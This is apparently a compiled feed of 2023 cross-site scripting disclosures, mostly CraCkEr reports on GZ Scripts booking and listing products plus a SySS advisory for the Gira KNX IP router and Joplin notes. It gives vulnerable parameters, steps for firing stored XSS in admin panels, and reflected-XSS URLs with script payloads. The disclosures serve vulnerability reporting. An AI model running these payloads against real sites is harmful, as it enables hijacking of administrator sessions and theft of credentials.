GZ Hotel Booking Script version 1.8 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://gzscripts.com/php-gz-hotel-booking-script.html                     ││  Vendor   : GZ Scripts                                                                 ││  Software : GZ Hotel Booking Script 1.8                                                ││  Vuln Type: Stored XSS                                                                 ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││                                                                                        ││  Allow Attacker to inject malicious code into website, give ability to steal sensitive ││  information, manipulate data, and launch additional attacks.                          ││                                                                                        │   ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘## Stored XSS-----------------------------------------------POST /PHPGZHotelBooking/load.php?controller=GzFront&action=booking_details HTTP/1.1first_name=[XSS Payload]&second_name=[XSS Payload]&phone=[XSS Payload]&email=cracker%40infosec.com&company=xxx&address_1=[XSS Payload]&city=xxx&state=xxx&zip=xxx&country=[XSS Payload]&additional=xxx&terms=1&date_range=29.06.2023+-+30.06.2023&date_to=30.06.2023&date_from=29.06.2023&adults=1&children=1&order=&sort=&fromNumber=&toNumber=&room_id%5B4%5D=1&room_id%5B3%5D=0&room_id%5B2%5D=0&room_id%5B1%5D=0&adults_arr%5B4%5D%5B1%5D=1&children_arr%5B4%5D%5B1%5D=1-----------------------------------------------POST parameter 'first_name' is vulnerable to XSSPOST parameter 'second_name' is vulnerable to XSSPOST parameter 'phone' is vulnerable to XSSPOST parameter 'address_1' is vulnerable to XSSPOST parameter 'country' is vulnerable to XSS## Steps to Reproduce:1. As a [Guest User] Choose any [Room] for Booking2. Inject your [XSS Payload] in "First Name"3. Inject your [XSS Payload] in "Last Name"4. Inject your [XSS Payload] in "Phone"5. Inject your [XSS Payload] in "Address Line 1"6. Inject your [XSS Payload] in "Country"7. Accept with terms & Press [Booking]   XSS Fired on Local User Browser8. When ADMIN visit [Dashboard] in Administration Panel on this Path (https://website/index.php?controller=GzAdmin&action=dashboard)   XSS Will Fire and Executed on his Browser9. When ADMIN visit [Bookings] - [All Booking] to check [Pending Booking] on this Path (https://website/index.php?controller=GzBooking&action=index)   XSS Will Fire and Executed on his Browser   10. When ADMIN visit [Invoices ] - [All Invoices] to check [Pending Invoices] on this Path (https://website/index.php?controller=GzInvoice&action=index)      [-] Done

GZ Hotel Booking Script 1.8 Cross Site Scripting

Ticket Booking Script version 1.8 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://gzscripts.com/ticket-booking-script.html                           ││  Vendor   : GZ Scripts                                                                 ││  Software : Ticket Booking Script 1.8                                                  ││  Vuln Type: Stored XSS                                                                 ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││                                                                                        ││  Allow Attacker to inject malicious code into website, give ability to steal sensitive ││  information, manipulate data, and launch additional attacks.                          ││                                                                                        │   ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘## Stored XSS-----------------------------------------------POST /TicketBookingScript/load.php?controller=GzFront&action=booking_details&cid=all&layout=calendar&show_header=T&local=3 HTTP/1.1title=mr&first_name=[XSS Payload]&second_name=[XSS Payload]&phone=[XSS Payload]&email=cracker%40infosec.com&address_1=[XSS Payload]&address_2=xxx&city=xxx&state=xxx&zip=xxx&country=[XSS Payload]&additional=xxx&captcha=wjrgvb&terms=1&ticket_id%5B%5D=532&event_id=3-----------------------------------------------POST parameter 'first_name' is vulnerable to XSSPOST parameter 'second_name' is vulnerable to XSSPOST parameter 'phone' is vulnerable to XSSPOST parameter 'address_1' is vulnerable to XSSPOST parameter 'country' is vulnerable to XSS## Steps to Reproduce:1. As a [Guest User] Choose any [Event] for Booking - Select seats 2. Inject your [XSS Payload] in "First Name"3. Inject your [XSS Payload] in "Last Name"4. Inject your [XSS Payload] in "Phone"5. Inject your [XSS Payload] in "Address Line 1"6. Inject your [XSS Payload] in "Country"7. Accept with terms & Press [Booking]   XSS Fired on Local User Browser8. When ADMIN visit [Dashboard] in Administration Panel on this Path (https://website/index.php?controller=GzAdmin&action=dashboard)   XSS Will Fire and Executed on his Browser9. When ADMIN visit [Bookings] - [All Booking] to check [Pending Booking] on this Path (https://website/index.php?controller=GzBooking&action=index)   XSS Will Fire and Executed on his Browser   10. When ADMIN visit [Invoices ] - [All Invoices] to check [Pending Invoices] on this Path (https://website/index.php?controller=GzInvoice&action=index)    XSS Will Fire and Executed on his Browser      [-] Done

Ticket Booking Script 1.8 Cross Site Scripting

Joplin before 2.11.5 allows XSS via a USE element in an SVG document.

**Joplin Cross-site Scripting vulnerability**

Moderate severity GitHub Reviewed Published Jun 30, 2023 to the GitHub Advisory Database • Updated Jun 30, 2023

GHSA-7grw-xfx6-qhx6: Joplin Cross-site Scripting vulnerability

Joplin before 2.11.5 allows XSS via an AREA element of an image map.

GHSA-4jjv-p8x9-rrf7: Joplin Cross-site Scripting vulnerability

GZ Appointment Scheduling version 1.8 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://gzscripts.com/php-gz-appointment-scheduling-script.html            ││  Vendor   : GZ Scripts                                                                 ││  Software : GZ Appointment Scheduling 1.8                                              ││  Vuln Type: Stored XSS                                                                 ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││                                                                                        ││  Allow Attacker to inject malicious code into website, give ability to steal sensitive ││  information, manipulate data, and launch additional attacks.                          ││                                                                                        │   ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘## Stored XSS-----------------------------------------------POST /PHPGZAppointment/load.php?controller=GzFront&action=step5 HTTP/1.1service_id=1&employee_id=1&timeslot=1688119200&lang=3&date=2023-06-30&title=mr&male=male&first_name=[XSS Payload]&second_name=[XSS Payload]&phone=[XSS Payload]&email=cracker%40infosec.com&company=xxx&address_1=[XSS Payload]&address_2=xxx&city=xxx&state=xxx&zip=xxx&country=[XSS Payload]&additional=xxx&captcha=murimy&terms=1&lang=3-----------------------------------------------POST parameter 'first_name' is vulnerable to XSSPOST parameter 'second_name' is vulnerable to XSSPOST parameter 'phone' is vulnerable to XSSPOST parameter 'address_1' is vulnerable to XSSPOST parameter 'country' is vulnerable to XSS## Steps to Reproduce:1. As a [Guest User] Choose any [Employee] & Select the Day and the Time2. Inject your [XSS Payload] in "First Name"3. Inject your [XSS Payload] in "Last Name"4. Inject your [XSS Payload] in "Phone"5. Inject your [XSS Payload] in "Address Line 1"6. Inject your [XSS Payload] in "Country"7. Accept with terms & Press [Booking]   XSS Fired on Local User Browser8. When ADMIN visit [Dashboard] in Administration Panel on this Path (https://website/index.php#!/GzAdmin/home/)   XSS Will Fire and Executed on his Browser9. When ADMIN visit [Bookings] - [All Booking] to check [Pending Booking] on this Path (https://website/index.php#!/GzBooking/index/)   XSS Will Fire and Executed on his Browser   10. When ADMIN visit [Invoices ] - [All Invoices] to check [Pending Invoices] on this Path (https://website/index.php#!/GzInvoice/index/)    XSS Will Fire and Executed on his Browser      [-] Done

GZ Appointment Scheduling 1.8 Cross Site Scripting

Property Listing Script version 1.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://gzscripts.com/property-listing-script.html                         ││  Vendor   : GZ Scripts                                                                 ││  Software : Property Listing Script 1.0                                                ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /preview.phpGET 'page' parameter is vulnerable to RXSShttps://website/preview.php?&page=j5wno%22%3e%3cscript%3ealert(1)%3c%2fscript%3epjd8c&sort_by=ascpricePath: /preview.phpGET 'layout' parameter is vulnerable to RXSShttps://website/preview.php?layout=gridpv063%22%3e%3cscript%3ealert(1)%3c%2fscript%3eg46bcPath: /preview.phpGET 'sort_by' parameter is vulnerable to RXSShttps://website/preview.php?&page=1&sort_by=orbb0%22%3e%3cscript%3ealert(1)%3c%2fscript%3edhv9a[-] Done

Property Listing Script 1.0 Cross Site Scripting

Car Listing Script version 1.8 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://gzscripts.com/car-listing-script-php.html                          ││  Vendor   : GZ Scripts                                                                 ││  Software : Car Listing Script 1.8                                                     ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /preview.phpURL parameter is vulnerable to RXSShttp://website/preview.php/n42rk"><script>alert(1)</script>i2rgn?controller=GzFront&action=detail&car_id=10Path: /preview.phpGET 'page' parameter is vulnerable to RXSShttp://website/preview.php?&page=tdnzc%22%3e%3cscript%3ealert(1)%3c%2fscript%3eq4n0s&sort_by=old_listingPath: /preview.phpGET 'sort_by' parameter is vulnerable to RXSShttp://website/preview.php?&page=1&sort_by=bpei5%22%3e%3cscript%3ealert(1)%3c%2fscript%3erfgo3[-] Done

CVE-2023-37298: Release v2.11.5 · laurent22/joplin

The web interface of Gira Giersiepen Gira KNX/IP-Router 3.1.3683.0 and 3.3.8.0 responds with a "404 - Not Found" status code if a path is accessed that does not exist. However, the value of the path is reflected in the response. As the application will reflect the supplied path without context-sensitive HTML encoding, it is vulnerable to reflective cross-site scripting (XSS).

\-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2023-016 Product: Gira KNX IP router Manufacturer: Gira Giersiepen GmbH & Co. KG Affected Version(s): 3.1.3683.0, 3.3.8.0 Tested Version(s): 3.1.3683.0, 3.3.8.0 Vulnerability Type: Cross-Site Scripting (CWE-79) Risk Level: Medium Solution Status: Unknown Manufacturer Notification: 2023-05-11 Solution Date: Unknown Public Disclosure: 2023-06-28 CVE Reference: CVE-2023-33276 Author of Advisory: Marc Gessler, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: The Gira KNX/IP router is a connection device for KNX lines for data transmission over the Internet Protocol. The manufacturer describes the product as follows (see \[1\]): > Connection of KNX lines with aid of data networks and use of the Internet protocol (IP). > Coupling of a KNX system together with the Gira HomeServer or Gira FacilityServer. > Filtering and forwarding of telegrams. > Use as line or area coupler. \[...\] Due to insufficient validation of user-provided input, it is vulnerable to cross-site scripting attacks. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: The web server interface of the product responds with a "404 - Not Found" status code if a path is accessed that does not exist. However, the value of the path is reflected in the response. As the application will reflect the supplied path without context-sensitive HTML encoding, it is vulnerable to a reflective cross-site scripting attack. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): Request: GET /%3Cimg%20src=SySS%20onerror=alert(%22XSS\_GIRA\_KNX/IP-Router%22)%3E HTTP/1.1 Response: HTTP/1.1 404 Not Found Server: ise GmbH HTTP-Server v2.0 Accept-Ranges: bytes Cache-Control: no-store, no-cache Content-Type: text/html Content-Length: 63 / ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Context-sensitive HTML encoding of user input before reflecting it back can be used to prevent a successful reflected cross-site scripting attack. More information can be found at: https://cheatsheetseries.owasp.org/cheatsheets/Cross\_Site\_Scripting\_Prevention\_Cheat\_Sheet.html. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2023-05-09: Vulnerability discovered 2023-05-11: Vulnerability reported to manufacturer 2023-06-28: Public disclosure of vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: \[1\] Product website for Gira KNX IP router https://katalog.gira.de/en/datenblatt.html?id=658626 \[2\] SySS Security Advisory SYSS-2023-016 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2023-016.txt \[3\] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Marc Gessler of SySS GmbH. E-Mail: marc.gessler@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/marc\_gessler.asc Key ID: 0x5077DCEB1C98D0A2 Key Fingerprint: 3F7B B558 6734 8FCF 25A0 F596 5077 DCEB 1C98 D0A2 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: https://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEEP3u1WGc0j88loPWWUHfc6xyY0KIFAmSaldAACgkQUHfc6xyY 0KIGvA/6AzbvWJ4hGNZ4wIh3vCk+RAUTr+85qvyDT2+1WaucwejYTTVOcTkm3Qy7 iQtRCrkN1zJedhC6v4S21/K0GZz55Lsw3Fo/vZ+8RLY8uWPYaRMRci9YUvDx5vmK EXqInUB7+5LWIt4YBDcE4xxlpOx+uDFroXMZyp7WBHVQ1iFdd3H0fu5RT7+PJSUS Cmt1SFYUPP6VDcT1UX14WdWglQ287V2HD3MPZ0Ot42QawrQxa8t035EP84ErP1iC 7NkWYBRRyTHXKRJNHuhSEo5KR0bS/bZb728qvPIHuIbg9Foyba4ocT8D2cd2O2xt f7r8tuSVaqOdxCGNduB54lIuXwbAnGKSSU4Uv9V+rfPT8vCWnIUXS4KilA3g+BI5 HG5xQj3yhd+KAnAlDeG7VWGpr+ZFrxG89ouDeSVuzMS5QF7qmE/15MQyru/VqhVB X8JosxR65088vTxYptjBAW2Xs+3LGbbBKVWKitfGB1k8CBWnDW+AR2nKA9xg4Tbv xfjb+v3tQJxUY5P9y5aYIrEnDn8sifn2mOkBD173Nwiz6NPPsV8OsgceBH0wrE+4 00jXoo7knDLOTpb9p8gVrLQ2fZIUlSG0N8XYtOfbZ4cxLC2IyTKklWmSyWvhS3/I I5tjosrMw8A/MiQQJo0wdaEh/FPkd+BXnks+phO6q7Unq+yJl6w= =wlzJ -----END PGP SIGNATURE-----

CVE-2023-33276

Cross-site Scripting (XSS) - Reflected in GitHub repository hestiacp/hestiacp prior to 1.7.8.

Tag

#xss